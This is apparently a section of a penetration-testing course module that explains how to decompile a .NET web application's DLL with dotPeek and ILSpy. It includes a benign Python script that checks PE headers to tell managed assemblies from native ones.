Advanced Deserialization Attacks
Decompiling .NET Applications
Introduction
As input for this penetration test, we have been provided with the deployment files of the web application, which was written in C#/.NET. This is fine for us, since .NET applications are compiled into intermediate code, known as Common Intermediate Language (also referred to as Microsoft Intermediate Language (MSIL) or simply Intermediate Language (IL)), which, unless obfuscated, typically decompiles very cleanly, resulting in code very similar to the original.
There is a large selection of tools that can be used to decompile .NET applications; popular ones include:
- JetBrains dotPeek (Free, Windows-only)
- ILSpy (Open-source, Cross-platform)
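Before loading a DLL into either tool, it is worth confirming that the file is actually a managed .NET assembly rather than a native DLL, because only managed code carries the IL that these decompilers recover. The check below is an added example, not part of the original page or of either tool: it parses the PE headers by hand and looks for a non-empty CLR runtime header (data directory entry 14, `IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR`), which is what the CLR loader itself keys on. The sample images built by `build_sample_pe` are constructed in the script so that it runs offline; the field offsets come from the PE/COFF specification.

```python
import struct
import sys

# Index of the CLR runtime header in the optional header's data directories
# (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR in winnt.h).
CLR_RUNTIME_HEADER_INDEX = 14


def is_managed_assembly(data: bytes) -> bool:
    """Return True if the PE image carries a CLR runtime header (i.e. is .NET)."""
    # DOS header: 'MZ' magic and e_lfanew (offset of the PE signature) at 0x3C.
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False

    coff = e_lfanew + 4          # 20-byte COFF file header
    opt = coff + 20              # optional header follows the COFF header
    if len(data) < opt + 2:
        return False
    magic = struct.unpack_from("<H", data, opt)[0]
    # Data directories start at offset 96 (PE32) or 112 (PE32+) of the optional
    # header; NumberOfRvaAndSizes sits in the 4 bytes just before them.
    if magic == 0x10B:           # PE32
        dir_off = opt + 96
    elif magic == 0x20B:         # PE32+
        dir_off = opt + 112
    else:
        return False

    num_dirs = struct.unpack_from("<I", data, dir_off - 4)[0]
    if num_dirs <= CLR_RUNTIME_HEADER_INDEX:
        return False
    entry = dir_off + CLR_RUNTIME_HEADER_INDEX * 8
    if len(data) < entry + 8:
        return False
    rva, size = struct.unpack_from("<II", data, entry)
    # A native DLL leaves this entry zeroed; a managed assembly points it at
    # the IMAGE_COR20_HEADER that describes the metadata and IL.
    return rva != 0 and size != 0


def build_sample_pe(managed: bool) -> bytes:
    """Construct a minimal (non-loadable) PE32 image for demonstration only."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    pe_sig = b"PE\0\0"
    # Machine=i386, 0 sections, timestamps/symbols zero, SizeOfOptionalHeader=224
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)
    # Magic 0x10B (PE32), 90 bytes of zeroed fields, NumberOfRvaAndSizes = 16
    opt = struct.pack("<H", 0x10B) + b"\0" * 90 + struct.pack("<I", 16)
    dirs = [(0, 0)] * 16
    if managed:
        dirs[CLR_RUNTIME_HEADER_INDEX] = (0x2008, 72)   # constructed RVA/size
    opt += b"".join(struct.pack("<II", r, s) for r, s in dirs)
    return dos + pe_sig + coff + opt


if __name__ == "__main__":
    # Usage: python check_managed.py bin\TeeTrove.dll
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            verdict = "managed (.NET)" if is_managed_assembly(fh.read()) else "native or not a PE"
        print(f"{path}: {verdict}")
```

Run it against every DLL in the deployment's `bin` directory to see which files dotPeek or ILSpy will actually be able to decompile; third-party native dependencies shipped alongside the application will be reported as native and need a different toolset.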
Note: This and the upcoming two sections provide a pre-customized Windows VM with all the required tools and customizations; utilize it to your advantage throughout the module. However, it is also recommended that you know how to set up these required tools yourself.
dotPeek
Installing dotPeek
Let's install dotPeek so that we can decompile the target application. We can download the installer for free from JetBrains' website and start the installation process. During installation, we can skip all products except for dotPeek.

Alternatively, we can simply select the portable version from the same download page to skip any installation process.
Decompiling with dotPeek
Once we have dotPeek open, we can select File > Open and then select bin\TeeTrove.dll in the file explorer. At this point, dotPeek will add the assembly and class list to the Assembly Explorer on the left side of the window.

From this pane, we can expand namespaces and double-click on classes to view the decompiled source code in the main window pane. Since decompilation is not a perfect process, there will be some code snippets that will look strange, like the line highlighted with the red rectangle in the image below.

By right-clicking on the TeeTrove assembly in the Assembly Explorer window, we can select Export to Project to save the decompiled source files to disk (as a Visual Studio solution in this case). This can be useful later, in case you want to use another tool to analyze/search through the source code.

ILSpy
Installing ILSpy
We can download the latest ILSpy release by heading to the release page of the project's GitHub repository. If you would prefer a portable version, select the self-contained ZIP file. If you would prefer to install ILSpy, then select the first -x64.msi file. Your browser may issue a warning about downloading an MSI file, but this can be ignored. Once downloaded, we can click through the installation process, keeping all default values.
Decompiling with ILSpy
Once installed, the decompilation process with ILSpy is very similar to dotPeek; hit File > Open and then select the DLL file bin\TeeTrove.dll in the file explorer window. The .NET assembly will be added to the Assemblies window on the left-hand side of the screen, and some assembly information will be displayed in the main window.

Using the Assemblies window, similar to dotPeek, we can navigate the namespaces and classes, and we can select individual ones to view the decompiled source code in the main window. You may notice that the output varies from dotPeek in certain places, for example, the Index function below compared to the Index function according to dotPeek above. In this case, ILSpy gave us output that is closer to the original code.

By right-clicking on the TeeTrove assembly in the Assemblies window, we can select Save Code to save the decompiled source files so that they can be opened with other tools.
